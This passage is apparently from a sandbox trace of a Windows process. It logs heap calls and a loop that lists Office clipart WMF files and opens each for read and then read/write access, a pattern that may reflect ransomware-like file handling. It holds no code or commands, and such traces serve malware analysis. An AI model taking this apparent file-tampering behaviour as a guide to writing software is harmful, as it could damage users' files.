Flags=0x0, Size=0x20) returned 0x883b0 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.807] AreFileApisANSI () returned 1 [0102.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0102.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 69 [0102.807] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1678)) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0102.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.808] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00267_.WMF", cAlternateFileName="")) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0102.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0102.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0102.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.809] AreFileApisANSI () returned 1 [0102.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 69 [0102.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.809] GetFileType (hFile=0x33c) returned 0x1 [0102.809] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.809] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.809] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.810] CloseHandle (hObject=0x33c) returned 1 [0102.810] AreFileApisANSI () returned 1 [0102.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 69 [0102.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.810] GetFileType (hFile=0x33c) returned 0x1 [0102.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.810] CloseHandle (hObject=0x33c) returned 1 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.811] AreFileApisANSI () returned 1 [0102.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0102.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 69 [0102.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa54)) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0102.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.812] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00269_.WMF", cAlternateFileName="")) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0102.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.813] AreFileApisANSI () returned 1 [0102.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0102.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.813] AreFileApisANSI () returned 1 [0102.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 69 [0102.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.813] GetFileType (hFile=0x33c) returned 0x1 [0102.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.814] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.814] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.814] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.814] CloseHandle (hObject=0x33c) returned 1 [0102.814] AreFileApisANSI () returned 1 [0102.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 69 [0102.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.814] GetFileType (hFile=0x33c) returned 0x1 [0102.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: 